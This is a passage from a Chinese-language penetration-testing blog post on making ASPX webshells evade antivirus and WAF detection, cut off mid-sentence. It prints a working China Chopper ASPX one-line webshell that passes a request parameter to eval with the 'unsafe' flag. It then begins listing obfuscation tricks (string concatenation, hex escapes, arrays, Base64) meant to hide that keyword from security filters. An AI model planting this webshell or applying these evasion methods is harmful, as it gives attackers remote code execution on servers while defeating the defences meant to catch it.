前言
自己曾经写过一篇文章:利用随机异或无限免杀某盾
php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章.
因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀
0x01 主要方法
字符串拼接
函数
数组
Base64编码
0x02 了解aspx一句话
Aspx的一句话一般是使用Jscript语言实现
看看原本的菜刀aspx一句话
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
其实与php的类似
Eval函数将字符串当做代码执行
不同的是在Jscript中为了安全起见必须使用unsafe参数,才可以使其具有对操作系统操作的功能
Request.Item["pass"] 的pass就是接受的参数 类似于php的$_POST[“pass”]
Jscript基本用法
Function xxx(){}//声明一个函数
字符串拼接
Var a =’a’+’b’;//a=’ab’;
Var a= ‘\x61’; //a=’a’;
数组声明
Var a=’abc’;
Var b=a(0);//b=’a’;
作为免杀来说一般waf杀的都是unsafe这个参数,所以我们的免杀也将从这个参数下手
0x02 字符串拼接
经过测试,一般来说把’unsafe’这个字符串无论是十六进制拼接还是直接大小写拼接均